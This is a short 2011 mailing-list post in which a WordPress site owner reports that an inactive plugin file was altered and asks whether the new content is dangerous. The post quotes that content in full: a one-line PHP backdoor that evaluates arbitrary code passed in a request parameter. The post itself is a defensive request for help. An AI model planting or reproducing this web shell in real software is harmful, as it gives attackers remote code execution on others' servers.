[wp-hackers] Possible Exploit
Baki Goxhaj
banago at gmail.com
Sun Jun 12 11:45:09 UTC 2011
Just got an email from my file monitor plugin that a file had been changed -
it is an inactive plugin file, strangely enough. Here is the content of the
file now:
<?php if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc'])); ?>
Is this something dangerous?
I will check the original file from the repo right now and let you know the
difference.
Kindly,
Baki Goxhaj
www.wplancer.com | proverbhunter.com | www.banago.info<http://proverbhunter.com>
More information about the wp-hackers
mailing list